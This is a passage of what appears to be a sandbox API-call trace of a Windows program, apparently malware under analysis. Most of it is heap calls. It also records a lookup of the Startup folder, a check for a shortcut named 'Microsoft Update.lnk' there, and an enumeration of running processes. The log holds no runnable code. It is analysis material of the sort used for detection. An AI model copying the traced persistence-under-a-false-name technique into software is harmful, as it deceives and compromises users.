hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0302.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0302.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0302.968] TranslateMessage (lpMsg=0x8bf710) returned 0 [0302.968] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0302.968] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0302.968] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0302.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0302.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0302.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0302.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0302.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0302.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0302.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0302.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0302.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0302.975] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0302.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0302.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0302.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0302.976] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0302.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0302.976] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0302.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0302.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0302.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0302.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0302.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0302.977] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0302.978] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0302.978] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0302.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0302.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0302.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0302.980] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0302.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0302.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0302.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0302.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0302.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0302.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0302.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0302.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0302.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0302.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0302.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0302.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0302.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0302.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0302.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0302.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0302.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0302.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0302.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0302.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0303.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0303.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0303.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0303.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0303.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0303.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0303.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0303.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 